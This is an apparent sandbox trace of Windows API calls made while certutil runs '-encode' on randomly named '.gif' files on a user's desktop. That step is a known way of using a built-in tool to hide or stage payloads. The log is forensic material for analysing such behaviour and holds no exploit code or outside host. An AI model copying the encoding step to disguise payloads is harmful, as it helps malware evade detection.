[0256.057] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0256.060] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0256.060] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0256.061] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0256.061] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0256.061] WerSetFlags () returned 0x0 [0256.062] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0256.062] __iob_func () returned 0x7ffcea2dea00 [0256.062] _fileno (_File=0x7ffcea2dea30) returned 1 [0256.062] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0256.062] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0256.063] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0256.063] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0256.063] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0256.064] GetConsoleOutputCP () returned 0x1b5 [0256.168] _vsnwprintf (in: _Buffer=0xa9a767fa10, _BufferCount=0xb, _Format=".%d", _ArgList=0xa9a767f938 | out: _Buffer=".437") returned 4 [0256.168] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0256.169] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0256.169] GetFileType (hFile=0x50) returned 0x2 [0256.169] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0256.169] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0256.169] SetThreadUILanguage (LangId=0x0) returned 0x409 [0256.239] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0256.240] GetCommandLineW () returned="certutil -encode \"t2RoafwhrVeC_4Hu.gif.Sister\" \"t2RoafwhrVeC_4Hu.gif.Cruel\"" [0256.240] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x22b55c1bf40 [0256.240] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x22b55c0cc20 [0256.240] LocalFree (hMem=0x22b55c1bf40) returned 0x0 [0256.240] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x22b55c14720 [0256.240] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x22b55c146f0 [0256.240] LocalFree (hMem=0x22b55c14720) returned 0x0 [0256.240] LocalFree (hMem=0x22b55c0cc20) returned 0x0 [0256.240] LocalFree (hMem=0x0) returned 0x0 [0256.240] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0256.241] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0256.242] GetCommandLineW () returned="certutil -encode \"t2RoafwhrVeC_4Hu.gif.Sister\" \"t2RoafwhrVeC_4Hu.gif.Cruel\"" [0256.242] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x22b55c1b860 [0256.242] GetSystemTime (in: lpSystemTime=0xa9a767f700 | out: lpSystemTime=0xa9a767f700*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x31, wSecond=0x1e, wMilliseconds=0x30f)) [0256.242] SystemTimeToFileTime (in: lpSystemTime=0xa9a767f700, lpFileTime=0xa9a767f6f8 | out: lpFileTime=0xa9a767f6f8) returned 1 [0256.242] FileTimeToLocalFileTime (in: lpFileTime=0xa9a767f6f8, lpLocalFileTime=0xa9a767f6c0 | out: lpLocalFileTime=0xa9a767f6c0) returned 1 [0256.242] FileTimeToSystemTime (in: lpFileTime=0xa9a767f6c0, lpSystemTime=0xa9a767f430 | out: lpSystemTime=0xa9a767f430) returned 1 [0256.242] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0xa9a767f430, lpFormat=0x0, lpDateStr=0xa9a767f540, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0256.242] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0xa9a767f430, lpFormat=0x0, lpTimeStr=0xa9a767f440, cchTime=128 | out: lpTimeStr="8:49 PM") returned 8 [0256.242] _vsnwprintf (in: _Buffer=0xa9a767f44e, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0xa9a767f418 | out: _Buffer=" 30.783s") returned 8 [0256.242] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x22b55c1e650 [0256.242] SetLastError (dwErrCode=0x80070716) [0256.242] _vsnwprintf (in: _Buffer=0xa9a767f4c8, _BufferCount=0xb, _Format="%d", _ArgList=0xa9a767f4b8 | out: _Buffer="948") returned 3 [0256.243] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0xa9a767f280, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0256.243] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x22b55c1b920 [0256.243] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x22b55c0bb60 [0256.243] LocalFree (hMem=0x22b55c1e650) returned 0x0 [0256.243] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xa9a767f770 | out: lpSystemTimeAsFileTime=0xa9a767f770*(dwLowDateTime=0xc3577b0f, dwHighDateTime=0x1d6141f)) [0256.243] GetLocalTime (in: lpSystemTime=0xa9a767f7a8 | out: lpSystemTime=0xa9a767f7a8*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x31, wSecond=0x1e, wMilliseconds=0x310)) [0256.243] SystemTimeToFileTime (in: lpSystemTime=0xa9a767f7a8, lpFileTime=0xa9a767f780 | out: lpFileTime=0xa9a767f780) returned 1 [0256.243] CompareFileTime (lpFileTime1=0xa9a767f780, lpFileTime2=0xa9a767f770) returned 1 [0256.243] _vsnwprintf (in: _Buffer=0xa9a767f7b8, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0xa9a767f748 | out: _Buffer="GMT + 2.00") returned 10 [0256.244] LocalFree (hMem=0x22b55c1b860) returned 0x0 [0256.244] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcde520000 [0256.244] FindResourceW (hModule=0x7ffcde520000, lpName=0x1, lpType=0x10) returned 0x7ffcde5e0090 [0256.244] LoadResource (hModule=0x7ffcde520000, hResInfo=0x7ffcde5e0090) returned 0x7ffcde5e00b0 [0256.244] LockResource (hResData=0x7ffcde5e00b0) returned 0x7ffcde5e00b0 [0256.244] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0256.244] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0xa9a767f7e8 | out: _Buffer="10.0.15063.447") returned 14 [0256.244] GetACP () returned 0x4e4 [0256.244] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0256.244] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x22b55c1bc20 [0256.244] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x22b55c1bc20, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0256.244] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x22b55c1e990 [0256.244] _vsnwprintf (in: _Buffer=0x22b55c1e990, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xa9a767f838 | out: _Buffer="10.0.15063.447 retailEvent") returned 21 [0256.245] LocalFree (hMem=0x22b55c1bc20) returned 0x0 [0256.245] LocalFree (hMem=0x0) returned 0x0 [0256.245] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0256.245] GetACP () returned 0x4e4 [0256.245] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0256.245] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x22b55c1b8c0 [0256.245] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x22b55c1b8c0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0256.245] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x22b55c1e710 [0256.245] _vsnwprintf (in: _Buffer=0x22b55c1e710, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xa9a767f838 | out: _Buffer="10.0.15063.447 retail") returned 21 [0256.245] LocalFree (hMem=0x22b55c1b8c0) returned 0x0 [0256.245] LocalFree (hMem=0x0) returned 0x0 [0256.245] GetACP () returned 0x4e4 [0256.245] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0256.245] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x22b55c1bfc0 [0256.245] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x22b55c1bfc0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0256.245] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x22b55c1e390 [0256.245] _vsnwprintf (in: _Buffer=0x22b55c1e390, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xa9a767f868 | out: _Buffer="10.0.15063.447 retail") returned 21 [0256.245] LocalFree (hMem=0x22b55c1bfc0) returned 0x0 [0256.245] LocalFree (hMem=0x22b55c1e990) returned 0x0 [0256.245] LocalFree (hMem=0x22b55c1e710) returned 0x0 [0256.246] LocalFree (hMem=0x22b55c1e390) returned 0x0 [0256.246] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0256.246] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0256.246] GetStockObject (i=0) returned 0x900010 [0256.246] RegisterClassW (lpWndClass=0xa9a767f990) returned 0xc1a2 [0256.246] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x1a02c8 [0256.345] NtdllDefWindowProc_W () returned 0x0 [0256.345] NtdllDefWindowProc_W () returned 0x1 [0256.351] NtdllDefWindowProc_W () returned 0x0 [0256.363] UpdateWindow (hWnd=0x1a02c8) returned 1 [0256.364] PostMessageW (hWnd=0x1a02c8, Msg=0x400, wParam=0x0, lParam=0x22b55c0217e) returned 1 [0256.364] GetMessageW (in: lpMsg=0xa9a767f9e0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xa9a767f9e0) returned 1 [0256.364] TranslateMessage (lpMsg=0xa9a767f9e0) returned 0 [0256.364] DispatchMessageW (lpMsg=0xa9a767f9e0) returned 0x0 [0256.364] NtdllDefWindowProc_W () returned 0x0 [0256.364] GetMessageW (in: lpMsg=0xa9a767f9e0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xa9a767f9e0) returned 1 [0256.364] TranslateMessage (lpMsg=0xa9a767f9e0) returned 0 [0256.364] DispatchMessageW (lpMsg=0xa9a767f9e0) returned 0x0 [0256.364] LocalAlloc (uFlags=0x0, uBytes=0x86) returned 0x22b55c04430 [0256.364] LocalAlloc (uFlags=0x0, uBytes=0x92) returned 0x22b55c095b0 [0256.364] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0256.365] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0256.365] SetLastError (dwErrCode=0x80070716) [0256.365] _vsnwprintf (in: _Buffer=0xa9a767f3e8, _BufferCount=0xb, _Format="%d", _ArgList=0xa9a767f3d8 | out: _Buffer="465") returned 3 [0256.365] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0xa9a767f1a0, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0256.365] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x22b55c14cc0 [0256.365] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0256.365] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0256.365] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0xa9a767f180, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0256.365] GetLastError () returned 0xcb [0256.366] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0256.366] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0256.366] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0256.366] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0256.366] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0256.366] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0256.366] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0256.366] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0256.366] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0256.366] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0256.366] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0256.366] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0256.366] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0256.366] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0256.366] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0256.366] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0256.366] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0256.366] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0256.366] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0256.366] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0256.366] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0256.366] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0xa9a767ee48 | out: phkResult=0xa9a767ee48*=0x23c) returned 0x0 [0256.367] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x22b55c0b290 [0256.367] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0xa9a767f3b8, lpData=0xa9a767f3e8, lpcbData=0xa9a767f3b0*=0x4 | out: lpType=0xa9a767f3b8*=0x0, lpData=0xa9a767f3e8*=0x0, lpcbData=0xa9a767f3b0*=0x4) returned 0x2 [0256.367] LocalFree (hMem=0x22b55c0b290) returned 0x0 [0256.367] RegCloseKey (hKey=0x23c) returned 0x0 [0256.367] LocalFree (hMem=0x0) returned 0x0 [0256.367] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x22b55c2be00 [0256.381] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0256.469] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0256.469] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0256.469] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0256.469] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0256.469] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0256.469] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0256.469] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0256.469] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0256.469] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0256.470] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0256.470] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0256.470] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0256.470] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0256.470] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0256.470] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0256.470] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x22b55c31020 [0256.470] GetComputerNameW (in: lpBuffer=0x22b55c31020, nSize=0xa9a767f3b0 | out: lpBuffer="NQDPDE", nSize=0xa9a767f3b0) returned 1 [0256.470] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0xa9a767f380 | out: lpBuffer=0x0, nSize=0xa9a767f380) returned 0 [0256.471] GetLastError () returned 0xea [0256.471] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x22b55c1bd60 [0256.471] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x22b55c1bd60, nSize=0xa9a767f380 | out: lpBuffer="NQdPdE", nSize=0xa9a767f380) returned 1 [0256.471] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0256.474] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x22b55c31750, cbCertEncoded=0x27eb) returned 0x0 [0256.476] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x22b55c31750, cbCrlEncoded=0x27eb) returned 0x0 [0256.477] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x22b55c31750, cbEncoded=0x27eb, dwFlags=0x8000, pDecodePara=0xa9a767f260, pvStructInfo=0xa9a767f2f0, pcbStructInfo=0xa9a767f2e4 | out: pvStructInfo=0xa9a767f2f0, pcbStructInfo=0xa9a767f2e4) returned 0 [0256.477] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x22b55c31750, cbEncoded=0x27eb, dwFlags=0x8000, pDecodePara=0xa9a767f260, pvStructInfo=0xa9a767f2f0, pcbStructInfo=0xa9a767f2e4 | out: pvStructInfo=0xa9a767f2f0, pcbStructInfo=0xa9a767f2e4) returned 0 [0256.477] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x22b55c31750, cbEncoded=0x27eb, dwFlags=0x8000, pDecodePara=0xa9a767f260, pvStructInfo=0xa9a767f2f0, pcbStructInfo=0xa9a767f2e4 | out: pvStructInfo=0xa9a767f2f0, pcbStructInfo=0xa9a767f2e4) returned 0 [0256.477] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x22b55c15c30 [0256.489] CryptMsgUpdate (hCryptMsg=0x22b55c15c30, pbData=0x22b55c31750, cbData=0x27eb, fFinal=1) returned 0 [0256.489] GetLastError () returned 0x8009310b [0256.489] CryptMsgClose (hCryptMsg=0x22b55c15c30) returned 1 [0256.489] GetFileAttributesExW (in: lpFileName="t2RoafwhrVeC_4Hu.gif.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\t2roafwhrvec_4hu.gif.sister"), fInfoLevelId=0x0, lpFileInformation=0xa9a767f310 | out: lpFileInformation=0xa9a767f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe16fce60, ftCreationTime.dwHighDateTime=0x1d5ebd5, ftLastAccessTime.dwLowDateTime=0x77a4ab20, ftLastAccessTime.dwHighDateTime=0x1d5e227, ftLastWriteTime.dwLowDateTime=0x77a4ab20, ftLastWriteTime.dwHighDateTime=0x1d5e227, nFileSizeHigh=0x0, nFileSizeLow=0x27eb)) returned 1 [0256.489] _vsnwprintf (in: _Buffer=0xa9a767f318, _BufferCount=0xb, _Format="%d", _ArgList=0xa9a767f308 | out: _Buffer="359") returned 3 [0256.489] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0xa9a767f0d0, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0256.489] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x22b55c31050 [0256.489] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0256.490] _vsnwprintf (in: _Buffer=0xa9a767e300, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0xa9a767f358 | out: _Buffer="Input Length = 10219") returned 20 [0256.490] GetFileType (hFile=0x50) returned 0x2 [0256.490] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xa9a767e300*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0xa9a767e2b4, lpReserved=0x0 | out: lpBuffer=0xa9a767e300*, lpNumberOfCharsWritten=0xa9a767e2b4*=0x14) returned 1 [0256.597] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0256.597] _vsnwprintf (in: _Buffer=0xa9a767e300, _BufferCount=0x1ff, _Format="\n", _ArgList=0xa9a767f358 | out: _Buffer="\n") returned 1 [0256.597] GetFileType (hFile=0x50) returned 0x2 [0256.597] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xa9a767e300*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xa9a767e2b4, lpReserved=0x0 | out: lpBuffer=0xa9a767e300*, lpNumberOfCharsWritten=0xa9a767e2b4*=0x1) returned 1 [0256.751] GetFileAttributesExW (in: lpFileName="t2RoafwhrVeC_4Hu.gif.Cruel" (normalized: "c:\\users\\fd1hvy\\desktop\\t2roafwhrvec_4hu.gif.cruel"), fInfoLevelId=0x0, lpFileInformation=0xa9a767f310 | out: lpFileInformation=0xa9a767f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc39965b6, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xc39965b6, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xc39fb8bd, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x371e)) returned 1 [0256.751] _vsnwprintf (in: _Buffer=0xa9a767f318, _BufferCount=0xb, _Format="%d", _ArgList=0xa9a767f308 | out: _Buffer="361") returned 3 [0256.751] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0xa9a767f0d0, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0256.751] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x22b55c316b0 [0256.751] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0256.751] _vsnwprintf (in: _Buffer=0xa9a767e300, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0xa9a767f358 | out: _Buffer="Output Length = 14110") returned 21 [0256.751] GetFileType (hFile=0x50) returned 0x2 [0256.751] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xa9a767e300*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0xa9a767e2b4, lpReserved=0x0 | out: lpBuffer=0xa9a767e300*, lpNumberOfCharsWritten=0xa9a767e2b4*=0x15) returned 1 [0256.822] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0256.822] _vsnwprintf (in: _Buffer=0xa9a767e300, _BufferCount=0x1ff, _Format="\n", _ArgList=0xa9a767f358 | out: _Buffer="\n") returned 1 [0256.822] GetFileType (hFile=0x50) returned 0x2 [0256.822] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xa9a767e300*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xa9a767e2b4, lpReserved=0x0 | out: lpBuffer=0xa9a767e300*, lpNumberOfCharsWritten=0xa9a767e2b4*=0x1) returned 1 [0256.901] LocalFree (hMem=0x22b55c31750) returned 0x0 [0256.901] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0256.901] _vsnwprintf (in: _Buffer=0xa9a767f378, _BufferCount=0xb, _Format="%d", _ArgList=0xa9a767f368 | out: _Buffer="2022") returned 4 [0256.901] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0xa9a767f130, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0256.901] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x22b55c08cf0 [0256.901] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0256.901] _vsnwprintf (in: _Buffer=0xa9a767e360, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0xa9a767f3b8 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0256.901] GetFileType (hFile=0x50) returned 0x2 [0256.901] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xa9a767e360*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0xa9a767e314, lpReserved=0x0 | out: lpBuffer=0xa9a767e360*, lpNumberOfCharsWritten=0xa9a767e314*=0x31) returned 1 [0256.977] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0256.977] _vsnwprintf (in: _Buffer=0xa9a767e360, _BufferCount=0x1ff, _Format="\n", _ArgList=0xa9a767f3b8 | out: _Buffer="\n") returned 1 [0256.977] GetFileType (hFile=0x50) returned 0x2 [0256.977] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xa9a767e360*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xa9a767e314, lpReserved=0x0 | out: lpBuffer=0xa9a767e360*, lpNumberOfCharsWritten=0xa9a767e314*=0x1) returned 1 [0257.052] LocalFree (hMem=0x0) returned 0x0 [0257.052] LocalFree (hMem=0x22b55c095b0) returned 0x0 [0257.052] LocalFree (hMem=0x22b55c04430) returned 0x0 [0257.052] SetLastError (dwErrCode=0x80070716) [0257.052] _vsnwprintf (in: _Buffer=0xa9a767f3e8, _BufferCount=0xb, _Format="%d", _ArgList=0xa9a767f3d8 | out: _Buffer="511") returned 3 [0257.052] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0xa9a767f1a0, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0257.052] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x22b55c312c0 [0257.053] PostQuitMessage (nExitCode=0) [0257.053] GetMessageW (in: lpMsg=0xa9a767f9e0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xa9a767f9e0) returned 0 [0257.053] LocalFree (hMem=0x22b55c1bd60) returned 0x0 [0257.053] LocalFree (hMem=0x22b55c31020) returned 0x0 [0257.053] LocalFree (hMem=0x0) returned 0x0 [0257.053] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0257.054] GetLastError () returned 0x7e [0257.054] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 